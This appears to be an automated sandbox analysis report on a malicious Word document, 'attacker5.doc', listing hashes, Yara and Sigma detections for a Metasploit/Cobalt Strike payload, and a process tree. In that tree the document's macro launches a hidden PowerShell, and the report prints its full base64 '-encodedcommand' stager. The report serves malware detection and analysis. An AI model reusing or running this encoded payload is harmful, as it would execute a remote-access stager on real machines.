Loading ...

Play interactive tourEdit tour

Windows Analysis Report attacker5.doc

Overview

General Information

Sample Name:attacker5.doc
Analysis ID:522199
MD5:4ac3d0835c1650e2ec73c8607d55ed1d
SHA1:ad6ebde97a0f082cfc812f5f99ecb83b0c4caf4b
SHA256:55c9ff8f829bf0d5bbec83127570ad149bd18bc0351c59933090af917b4451db
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MetasploitPayload
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Malicious encrypted Powershell command line found
Antivirus detection for dropped file
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Microsoft Office Product Spawning Windows Shell
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Machine Learning detection for sample
Sigma detected: Suspicious PowerShell Cmdline
Document contains an embedded VBA macro with suspicious strings
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Detected TCP or UDP traffic on non-standard ports
Document contains embedded VBA macros
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2080 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 1292 cmdline: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEoATABPAFUASAA4AFoAbABMAFMAWABaAGMAYwBrAGsAdAB1ADEAeQArAHYAbQBPAFoASQB4AGMAUQBRAEUAMABJAFgASgB0AEQASQBXADQAMwBsAGIAeQBNAGwAWQByAE0AWQArAFMATABxAFgAUwBZAHQAWQBNACsASAB3AHMARABmADgAQQB2ADQASQBuAGgAWQBYAHkAQgBIADQAKwBIAGMANAArAGIAagB6AFUAKwBtAGsAdwBIADkATgBBAFEAWgA0ACsAOQBaAHAAUgBFAFkAcgBUAGcAYQBFAGEAZwBRAGUANwBOADcALwBPAEcARwBFAC8AYwBwADMAcABrAE4AKwB1ADYASgA4AFkAeQB6AEkAVQBQAC8AaQBEAHMAaQBYAEcAUABIAFQAUgA4AFYAMgBqAHYAegBNADcARgB6AGwAbAAvAHAAaQBaADEAZABTAE0ASwBEADIAcABmAGEAQQA1AFcAbwBaAEQASgBEADgAUwBZAEUALwB4AHUAeAA0AFgAeAB2AFIAaAAzADMAUwBIAG8AUABiAFkAOQBoADAAdgAwAEoAdQBhAEgAYgBiAHcAWgBhAHcAbABEAEgAagBIAGEAbgBkAEwAUgBxAHEATABRADkAZgA0AHEAbABjAGMAcgAzAHAATQBWAFIAeAArAHIAOQBaAGsAdwBsAE4AOABhAFAARABuAFIAKwBtAEIATwA2ADMAeQA0ADEAVgBjACsAegAwAHoAVgBrAFEAZAB4AGkAcwB4AE8AYQBUAHYARABWAEYARwA0AFYARAB0AEcAYgA5AE8AdQBkAE4AQQBHADgAbABnAGYAKwBZADgAdAAvAGEAMgBSAEMAbgBJAFQAYwBEAGcAcABxAGIAUwBmAHQAZgBXAFQAdABoAEUAUwBiAFMATwBQADAAOABHAFQAMwBBAGUANwBmAHIAVABlAE4AUQBlAFMAdwBvAEIAdABSAFQAOABsACsAagBLAGMARABCAGYAawBpAFoAawBpAHUANQBtAG0AVAByAE0AcgBIAHMAVABUAFcAUABQAEkAYQBqAE4AcwBCAHkAagB0AGUAbQBNAFQAcQA1AHgAQgBNAHQAMwBoAGUATABzAGIAZABuAGgAeQA5AGsAOQBSADUAcQBrAE8AdABxADMAQgBvAGoAYwBDADIAMAA1AFgAawBpAEEAWABxAEMAWABnAEoAYwBpAE0AUQBoAE4AcwBQAFEAYQArAGEARQBxAEgAdABIADMAUQBHAEQAbQBSAE4ATgA2AEsATgBHAFYAYQBDAFcAYwBwAE0AOQB1ADIATgBiAFIATgBlADEATwBXAFYAVQBlAGoAdwBUAEYAeABIAHcAUABQADkAOQB2AEgANwB0AE0AbQBsAFQAdgBpAGwASwA3AGcAVgBiAGgAdAB6AHAATgBPAEoAMwA2AG8AdAA3AG0ATgA5ADkAaABOAFYAOABhAHEAVwBUACsARQBnAHUAYgBlADcANwBYADcASgB1AEgAYQA0AFoANwBUACsAdQB6AFMAUABNADQAYQBpAC8AMABZADcAUgA0ADIAOQBwAHYASQBiAEcAZAB6AGkANQA4ADgASABlAGYAOQB4AFUAcgBiAHMAbwAyAFcAdABGADUANgAwAHcAVQB0AFMAawBKAEMATAA5AGkARQBzAEEAdQArAHQAWgBoAFoAKwBtAGkAMgA3AFAAVAA3AHIAQgB4AHAAZgBjADkAbQBUADYASABNAG4AMwBZADkASABmAEkAeABwADAALwBMAEoAUwBzAFQAUABaAEgAVwB2AGIAbgA0AHgARABMADYAWABEAG4AcQBtAGIAMwBjAFIAcAArAFYAWgBIAFcAOQBaAGQAZwBHAEYAMgBzAHoAYQBkADYAYgBTADcASwB3AGwANQBiADgAZgBEAFkAYQBtADgAZgBEAGsAOQBIAG4ARgBpAHUARgBuAC8ASAAzADkAbgAxAEwATgAxAHIAMwBoAHQAYwA5AEMASABIAHoAbgByAFYAWgBKADAAWgAxAHMANQBKADAAVgBOAHUAKwBmADIAagB2AHUAQwBXAHoAVwB3AFoAcgBtAGYAZQBUAEoAUgBUAEgAZABHAEcAZABqAEEAZQByADAAeAByAEYASgBwAHIAdQAyAC8AUABPAFEAZQBWAFgAWAB0AHcAUQBKAEgAbwBtAGUAWQByADkARwBEAC8ATQBrAFMASAB2AE8ARwA0AHQAVABmAGMASABvADgARgAxAFQAMgA5AG0AMwAyADUAQgBlAGIAbABuAHAAUQBSAFgAVQB0ACsAUgB1AGcATQBoAFUAdgB2AHQAbABoAEoASQBSAG8AZgBWAGUAZwA4AFQAZABEAEEAYgBpAHEAMAB2ADcAZgBVAG0AawBPAGwAVwB4AGQAZwBOAGoAcgBQAEoAawBDAEYAdgBLAGEATAA1AEoAYgA5ADEAagBVAHAAbwA4AFAANQBoADMARwBwAHQAagBIAHUATQBoAHMASgBoAHcAOQBVADMAawA5AFcARQA3AGYAZwB6AHQAeAAzAHYAcABXAEIAeQBhAEEANgBPAFgATABTAFAASgBrAG4ARgAwAFcASQBqAFgAcwA5AHAAUQAwAEwAcQAwADIAQwA2AE4AdwBiAE4AKwBrAFIAdwBMAFYATwBLAGgARwBhAEYANAA3AFoAYQBYAFcARwBTAFIARwA3AEsAdQAyADEAWABIAHQATQB0AHgATwBuAEEAVQAyAFUAdABqADgAVQAzADQARABNAGQASABzAFMARwBkAE4AQgA1ADgAcgBCAG4AZQBuADMAZwBZAFcASQBEAFgANABCAEgAWgBzAFUAWgBKAG4ANABJAFAARQAyAGwAbgBwAGoASwBHAFYAZABQAEIAQQBWAGMAegB0AFcANgBZAGYAbgBkAG0AZABrAGMAcQBRAGYAZwB5AEUATgBUAGkAawBZAFEAaABNAGIAdgBaAHkAdgBJADEAWQBKAG4ANgBiAFUAdwBvADkAWAArAHgAVgBaAFcAagBRAHcAMwBnAFAANwBpAGwATgAzAFoALwA2AEwAZwAvADgANABpADEASAB1ADkAZwBTAG8ARABCAFMAeQBiAHIAMQBUAEsAMgBiADMALwB2AHYASgA4AGUAMwBxADUAOQBtAG4AdgA3ADMAZgBxAEMAYQB3AHgAcgBhAHgAMgA1AFMAcwB4ACsAbABDAHgAZgB0AFgAOABTAEMAZwBJADkAOABpAEMAUwBnAFkATgB6AFAAWAA2AEUAZAB4AEEAdQBMAFEAaABVADkAZgBNAE4ARQBxAGwAegB6AHYAbgBJAHcANABjAGIARQBGAFgAQwBYADMAbgB0AFcAaQB6AGwAdQBWAHEAVwBlAFAAMABpAHcANABHADIAcgBoAHoAYwAvAFUAQwBsADkATQBTAGgAawB6AGoAMAAxAEcAWgBlAGgAZQBFAGIAdQBrAGMAawB4AG8AWgBSAHQANQBjAFgAQwBLADgAOQBsAGgAWAB3AFMAOQBmAHQAaABCAGUAOQBRAE8ASQBZACsAegBzAHkATAA1AEsAMABTAGUARwBwAHUAbgBzAHYAMABtAFgAQwA3ADgAUABTADkAZgAxADAAdABLADcAdQBXAHIAVwBYAEgAMwB3ADUATwBOAE8AVgByADUAVAArAFkASgArAEUARABrADIALwBqADgAbQA0AEkAZABOAC8AegB1ADAARwBYAGgANQBmAC8AWQBPAFgAZQA3AFEANQAzAGkAVgBDADgAVQAvAEMAZwBYAFIAbwBEADcATQBoACsAWQBiAGYASAAxAGcAbgAzAHIATQB1AFIAYwBDAHoAYwBuAGQAdwBWAFgAaABVAHkAVwAvAGUAMAB1ADMAcQBFAHkASgAvAEkAYQA2AFIAZABSADMANgBnADcAQwBZADAATwBtAEEAZAA4AHIAdwBTADcASwBMAG0ATABxAC8AUABuADEAagBVAHEAUQBlAFYAYgA4AFIAcwAyAHgAaABxAEYAOQB2AGgAdQA2AEsAcgBBAFUAUQB6ACsAVgBtAGMANgBOAFoATQBJAHcAOQB6AGUAVQBZADgARgBrAHoAdwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AAoA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • powershell.exe (PID: 2912 cmdline: "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
attacker5.docOffice_AutoOpen_MacroDetects an Microsoft Office file that contains the AutoOpen Macro functionFlorian Roth
  • 0x719e:$s1: AutoOpen
  • 0x5280:$s2: Macros

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0x5488:$s1: \Common Files\Microsoft Shared\
  • 0x2a46:$s2: Scripting.FileSystemObject
  • 0x644c:$s2: Scripting.FileSystemObject
  • 0x2da3:$a3: AutoOpen
  • 0x70a6:$a3: AutoOpen
  • 0x729f:$a3: AutoOpen
  • 0x8f45:$a3: AutoOpen

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.418638987.0000000002DA7000.00000004.00000001.sdmpSUSP_PS1_FromBase64String_Content_IndicatorDetects suspicious base64 encoded PowerShell expressionsFlorian Roth
  • 0x63a8:$: ::FromBase64String("H4s
  • 0x63a8:$: ::FromBase64String("H4sIA
00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmpMsfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
  • 0x6ba0:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0x7148:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0x7236:$s5: = [System.Convert]::FromBase64String(
  • 0x6e5c:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0x7086:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
  • 0x725c:$s11: 38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0
00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
    00000002.00000002.417824735.0000000000350000.00000004.00000020.sdmpWiltedTulip_WindowsTaskDetects hack tool used in Operation Wilted Tulip - Windows TasksFlorian Roth
    • 0x698a:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
    Click to see the 17 entries

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
    Source: Process startedAuthor: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEo
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEo
